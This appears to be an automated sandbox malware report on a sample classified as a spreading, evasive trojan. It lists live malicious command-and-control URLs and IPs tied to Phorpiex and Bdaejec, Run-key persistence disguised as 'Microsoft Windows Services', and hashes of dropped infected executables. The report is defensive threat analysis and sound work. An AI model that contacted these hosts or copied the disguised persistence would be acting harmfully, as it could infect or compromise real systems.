winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
http://afeifieuuufufufuf.net/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://fifiehsueuufidhfi.su/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
http://aiiaiafrzrueuedur.com/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.smartsharesystems.com/	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://nousiieiffgogogoo.su/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: malware	unknown
http://www.scintilla.org	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://noeuaoenriusfiruu.net/tldr.php?newinf=1=BZ	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://fuaiuebndieufeufu.su/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://srndndubsbsifurfd.su/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://aiiaiafrzrueuedur.net/tldr.php?newinf=10B%	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://fuaiuebndieufeufu.ru/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://slpsrgpsrhojifdij.net/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://afeifieuuufufufuf.com/	LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
http://srndndubsbsifurfd.in/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://aiiaiafrzrueuedur.biz/tldr.php?newinf=1	winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarh?p	XBVdJN.exe, 00000001.00000002.2443353213.00000000011D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.baanboard.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.66	aiiaiafrzrueuedur.net	Portugal	206894	WHOLESALECONNECTIONSNL	false
34.218.204.173	eiifngjfksisiufjf.biz	United States	16509	AMAZON-02US	false
208.100.26.245	ssofhoseuegsgrfnj.in	United States	32748	STEADFASTUS	false
199.59.243.226	86537.BODIS.COM	United States	395082	BODIS-NJUS	false
44.213.104.86	eiifngjfksisiufjf.in	United States	14618	AMAZON-AESUS	false
92.63.197.48	unknown	Russian Federation	204655	NOVOGARA-ASNL	false
44.221.84.105	iuirshriuisruruuf.in	United States	14618	AMAZON-AESUS	false
170.39.226.155	ssofhoseuegsgrfnu.ru	Reserved	139776	PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY	false
13.251.16.150	slpsrgpsrhojifdij.net	United States	16509	AMAZON-02US	false
54.244.188.177	noeuaoenriusfiruu.biz	United States	16509	AMAZON-02US	false
74.119.239.234	afeifieuuufufufuf.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
92.246.89.93	ssofhoseuegsgrfnj.su	Russian Federation	49558	LIVECOMM-ASRespublikanskayastr3k6RU	false
18.141.10.107	nousiieiffgogogoo.net	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1481855
Start date and time:	2024-07-25 15:12:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LisectAVT_2403002B_290.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@27/28@111/13
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 96 Number of non-executed functions: 278
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: LisectAVT_2403002B_290.exe

Simulations

Behavior and APIs

Time	Type	Description
09:13:29	API Interceptor	1x Sleep call for process: WerFault.exe modified
09:14:11	API Interceptor	7142790x Sleep call for process: winsvcs.exe modified
15:13:28	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Windows Services C:\Windows\94000696690303050\winsvcs.exe
15:13:36	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Windows Services C:\Windows\94000696690303050\winsvcs.exe
15:13:56	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Windows Services C:\Windows\94000696690303050\winsvcs.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.66	3YHDfHLvo4.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66/_2
	SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66/6
	SecuriteInfo.com.Trojan.DownLoader46.2135.7325.13890.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66/_3
	BFP2Kvubpo.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66/_3
	WI6a5vSCOb.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66/_3
	xJd712XMG6.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66/6
	lRT1FK9PcL.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66/_1
	5qO4CoKcQo.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66/_2
	SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66/_2
	I7ldmFS13W.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66/6
34.218.204.173	Bn0VHqJWSS.exe	Get hash	malicious	Unknown	Browse	eveningbecome.net/index.php
	gZVfHNoTGQ.exe	Get hash	malicious	Unknown	Browse	eveningbecome.net/index.php
	Bn0VHqJWSS.exe	Get hash	malicious	Unknown	Browse	eveningbecome.net/index.php
	gZVfHNoTGQ.exe	Get hash	malicious	Unknown	Browse	eveningbecome.net/index.php
208.100.26.245	http://g29316481580.co	Get hash	malicious	Unknown	Browse	g29316481580.co/favicon.ico
	http://a.5aa28fd0288f8ce3733a7c9fc585ac36.com	Get hash	malicious	Unknown	Browse	a.5aa28fd0288f8ce3733a7c9fc585ac36.com/favicon.ico
	HrONRdSlYf.exe	Get hash	malicious	Unknown	Browse	weatherbicycle.net/index.php
	spug64.exe	Get hash	malicious	Simda Stealer	Browse	lyvyxor.com/login.php
	i0PNkJ8um8.exe	Get hash	malicious	Unknown	Browse	breadmayor.net/index.php
	Mfd1iISnqC.exe	Get hash	malicious	Unknown	Browse	streettoward.net/index.php
	oO4jogbesK.exe	Get hash	malicious	Unknown	Browse	streettoward.net/index.php
	vtS0cwx3fg.exe	Get hash	malicious	Unknown	Browse	streettoward.net/forum/search.php?email=ballaviorica@drballa.eu&method=post
	CMO4VDTx2J.exe	Get hash	malicious	Unknown	Browse	husbandnothing.net/index.php
	file.exe	Get hash	malicious	Unknown	Browse	www.f5ds1jkkk4d.info/t_100_v400/?rnd=1519662906&id=632934364559

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	LisectAVT_2403002B_293.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_296.exe	Get hash	malicious	Bdaejec, BlackMoon	Browse	44.221.84.105
	LisectAVT_2403002B_301.exe	Get hash	malicious	Bdaejec, GCleaner	Browse	44.221.84.105
	LisectAVT_2403002B_309.exe	Get hash	malicious	Bdaejec, FormBook	Browse	44.221.84.105
	LisectAVT_2403002B_303.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	LisectAVT_2403002B_302.exe	Get hash	malicious	Bdaejec, Emotet	Browse	44.221.84.105
	LisectAVT_2403002B_307.exe	Get hash	malicious	Bdaejec, GhostRat, Nitol	Browse	44.221.84.105
	LisectAVT_2403002B_308.exe	Get hash	malicious	Bdaejec, Mars Stealer, Stealc, Vidar	Browse	44.221.84.105
	LisectAVT_2403002B_315.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	LisectAVT_2403002B_324.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	Re_ Q22689 - 07.24.2024_Conduit Construction Network Ltd_Today.eml	Get hash	malicious	Unknown	Browse	34.252.40.201
	LETTER.pdf	Get hash	malicious	Unknown	Browse	18.239.83.16
	http://www.cabrerallamas.com/	Get hash	malicious	Unknown	Browse	18.158.75.66
	http://ads.livetv799.me	Get hash	malicious	Unknown	Browse	108.156.64.41
	phish_alert_sp2_2.0.0.0(4).eml	Get hash	malicious	HTMLPhisher	Browse	18.245.86.89
	LisectAVT_2403002B_404.dll	Get hash	malicious	Ramnit	Browse	18.239.83.98
	phish_alert_sp2_2.0.0.0 (27).eml	Get hash	malicious	HTMLPhisher	Browse	18.239.18.33
	LisectAVT_2403002B_412.exe	Get hash	malicious	FormBook	Browse	18.163.247.76
	Ewhite Replay VM .docx	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	13.227.219.97
	Shipping_Details_Details.html	Get hash	malicious	Unknown	Browse	18.239.83.87
BODIS-NJUS	LisectAVT_2403002B_401.exe	Get hash	malicious	CryptOne	Browse	199.59.243.226
	LisectAVT_2403002B_482.exe	Get hash	malicious	Bdaejec, Raccoon	Browse	199.59.243.226
	LisectAVT_2403002C_186.exe	Get hash	malicious	Upatre	Browse	199.59.243.226
	Ia93PTYivQ.exe	Get hash	malicious	BlackMoon, Neshta	Browse	199.59.243.226
	RFQ New Order - 57m#U00b3 LPG SEMI TRAILER 7 NOS.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	Yb6ztdvQaB.elf	Get hash	malicious	Unknown	Browse	199.59.242.150
	SLL8zVmaGj.elf	Get hash	malicious	Unknown	Browse	199.59.242.150
	Wk8eTHnajw.elf	Get hash	malicious	Unknown	Browse	199.59.243.226
	http://proxv593uu9848j.com	Get hash	malicious	Unknown	Browse	199.59.243.226
	Hesap_Hareketleri_20-07-2024.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
WHOLESALECONNECTIONSNL	LisectAVT_2403002B_53.exe	Get hash	malicious	Amadey	Browse	185.215.113.32
	LisectAVT_2403002B_77.exe	Get hash	malicious	Amadey	Browse	185.215.113.32
	Lisect_AVT_24003_G1A_79.exe	Get hash	malicious	Amadey, Bdaejec	Browse	185.215.113.32
	LisectAVT_2403002B_351.exe	Get hash	malicious	Amadey, Bdaejec	Browse	185.215.113.32
	zkGOUJOnmc.elf	Get hash	malicious	Unknown	Browse	185.215.113.5
	hNX3ktCRra.elf	Get hash	malicious	Unknown	Browse	185.215.113.5
	Yb6ztdvQaB.elf	Get hash	malicious	Unknown	Browse	185.215.113.5
	setup.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, Quasar, RedLine	Browse	185.215.113.67
	3YHDfHLvo4.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.84
	SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
STEADFASTUS	LisectAVT_2403002B_401.exe	Get hash	malicious	CryptOne	Browse	162.210.101.20
	Remittance advice.htm	Get hash	malicious	Unknown	Browse	67.202.105.32
	http://kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerror	Get hash	malicious	HTMLPhisher	Browse	67.202.105.23
	http://saving-old-seagulls.co.uk	Get hash	malicious	Unknown	Browse	67.202.105.31
	https://inscricao.faculdadeitop.edu.br	Get hash	malicious	Unknown	Browse	67.202.105.31
	http://thriftyguatemala.com	Get hash	malicious	Unknown	Browse	162.210.99.145
	http://aol-ahc-hrsn-form.pages.dev/	Get hash	malicious	Unknown	Browse	67.202.105.24
	https://www.mediafire.com/file/25smb6ft3b8nwuu/instagram-crypto-ae.zip/file	Get hash	malicious	Unknown	Browse	67.202.105.24
	https://www.mediafire.com/file/25smb6ft3b8nwuu/instagram-crypto-ae.zip/file	Get hash	malicious	Unknown	Browse	67.202.105.32
	https://www.mediafire.com/file/25smb6ft3b8nwuu/instagram-crypto-ae.zip/file	Get hash	malicious	Unknown	Browse	67.202.105.34

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\XBVdJN.exe	LisectAVT_2403002B_293.exe	Get hash	malicious	Bdaejec	Browse
	LisectAVT_2403002B_296.exe	Get hash	malicious	Bdaejec, BlackMoon	Browse
	LisectAVT_2403002B_301.exe	Get hash	malicious	Bdaejec, GCleaner	Browse
	LisectAVT_2403002B_309.exe	Get hash	malicious	Bdaejec, FormBook	Browse
	LisectAVT_2403002B_303.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse
	LisectAVT_2403002B_302.exe	Get hash	malicious	Bdaejec, Emotet	Browse
	LisectAVT_2403002B_307.exe	Get hash	malicious	Bdaejec, GhostRat, Nitol	Browse
	LisectAVT_2403002B_308.exe	Get hash	malicious	Bdaejec, Mars Stealer, Stealc, Vidar	Browse
	LisectAVT_2403002B_315.exe	Get hash	malicious	Bdaejec	Browse
	LisectAVT_2403002B_324.exe	Get hash	malicious	Bdaejec	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.590670202040179
Encrypted:	false
SSDEEP:	384:1F6SxXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:bPQGPL4vzZq2o9W7GsxBbPr
MD5:	640E1A087D4148B9F58A298FED51A789
SHA1:	B2C061043622CA58F5071421EF82BD38ECFDA8CC
SHA-256:	7AB964BFEFF828F54E71C643A00E424236CA20A3E595415F3A560246BF7CCFF1
SHA-512:	DDC2AB5DC770D6E948C8983549E1DE92319C29829DF30792EE245A3E890122D427704EF778500630DECC2E7FF4EDDD7FAA0B754232D0DF996F70253DD9BE50FE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2389504
Entropy (8bit):	6.731348991300747
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	2A37A40D2D3E6647E07668C3F8B71DE6
SHA1:	52F63D93F162A3F712007C563C1C0E64E98CED0C
SHA-256:	D2AE3F1C0FD06A8FE2E3865F04ED1055AAB77CD8F3B98086B4E51165000279EA
SHA-512:	57192053FE020B2297C53BEE9D7BB3A2AA73AA831D5532409CBA52D7FCDE26B79605D4B6E4C5D7BD955632D3E64720244F08E0590AEC737B672186FA1666AD35
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XBVdJN.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.366568458079755
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdUTQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdUEGCq2iW7z
MD5:	25B6813AF8D7F110CEB3E0A660842A9A
SHA1:	5107518F0155FE8EB471ABA59A42F1F691DDB102
SHA-256:	A4BC4F6CF3FBAD59F3E9ED804DA6ED8033AD113B7D59A9742BE5020D5E2CAB27
SHA-512:	E4A42BB3298B3163F0F9B43BBE29FFA1520571FC2FA9507EA03E87BF270812E9AF1908FCE76FAA4ECD85AA8B172A9AFBB79A6B35D5C25081BF858945858854B2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_XBVdJN.exe_e5e08bf8fb123f7db911eb6aa6ab71c5afa27129_87f585be_382370fe-9777-448a-8905-7ec652631733\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9890406449894872
Encrypted:	false
SSDEEP:	96:zn0FnAYbjysJhnL7afzQXIDcQtpc6t8cEMcw3QD+HbHg/5ksS/YyNX6cbhnRYGST:4Hbjya0F6Wkgj0/lBzuiFdZ24IO8B
MD5:	3107E56DD510A71162B60D40E45ED852
SHA1:	E0BE65371B6EED10C983A7EB9F9E025826600C57
SHA-256:	95E3CA1F7032804496E7429B1B78F031C320C678C34176F7D5F965FB9CD2C5A5
SHA-512:	5C0A4E79BD9C53A3AE32A820602E2BE60EF542B2FFF18FB002BA97537FB2A186B41E7F7B8833DD0DCD482349AC6EAB1E885C20D2F804873DEBFFFFD040A92A03
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.8.6.8.0.5.1.1.3.8.4.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.8.6.8.0.5.6.7.6.3.4.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.2.3.7.0.f.e.-.9.7.7.7.-.4.4.8.a.-.8.9.0.5.-.7.e.c.6.5.2.6.3.1.7.3.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.4.a.7.d.4.d.-.8.5.b.f.-.4.d.5.f.-.9.1.a.b.-.9.e.a.e.1.a.d.0.9.a.a.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.X.B.V.d.J.N...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.7.4.-.0.0.0.1.-.0.0.1.5.-.1.8.4.c.-.1.e.6.a.9.4.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.d.d.2.f.c.b.8.e.6.3.e.e.0.7.d.f.d.4.c.f.6.f.a.e.6.1.1.3.8.4.8.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.X.B.V.d.J.N...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER15F5.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jul 25 13:13:25 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	157974
Entropy (8bit):	1.8762239744035139
Encrypted:	false
SSDEEP:	384:jVrMBNBjBt607YDJR72+OTH5kR8khhtQbQVDroy565nCtq2:jVgjjBt607YDf2+WH5qTo2kDEtq2
MD5:	D06A60BDBE1706DD5E934B2A8B86F1B9
SHA1:	A1C8AAC4E86BC702387D8A2BDD1E8DFB9FBEE253
SHA-256:	DEE33F79ED22976A38D8E4230D0CE98082AE7F7B3A822857ED486081B01BCDD7
SHA-512:	75BDA6C259A0108A8452AFD31B1BDE398D7B4C028269A87AF72E18768137D5D57C1181DB6BF3C59F978BE4E062FFF19247318A24455FD859A8509B1AEEB4D74E
Malicious:	false
Preview:	MDMP..a..... .......uO.f............D...............X.......<.... ......D....N..........`.......8...........T............=..&+..........8!..........$#..............................................................................eJ.......#......GenuineIntel............T.......t...mO.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER175D.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8290
Entropy (8bit):	3.7024981589720563
Encrypted:	false
SSDEEP:	192:R6l7wVeJZv6f6YYlB62ggmfGX4pDV89bRHsfFbm:R6lXJB6f6Ym6hgmfG3RMfU
MD5:	2E95112454E23D0C8EE0FD75B195915E
SHA1:	7FF6B26CC237F4FE01EE7DFB7DA8F61B83184F74
SHA-256:	42A8221CB4C11C7BB069D464CB1E4556510C1D7EBB73772E7AD62BBDB8021E38
SHA-512:	9469D4816879C2F158152E9684A2FFDED6A9980B8FB80F77648AA4AF4D093C5FAB9D301A93B52C485F106D0DF98ED7AE6AD7F69D352DF50B38D7A10C0A96B2EF
Malicious:	false
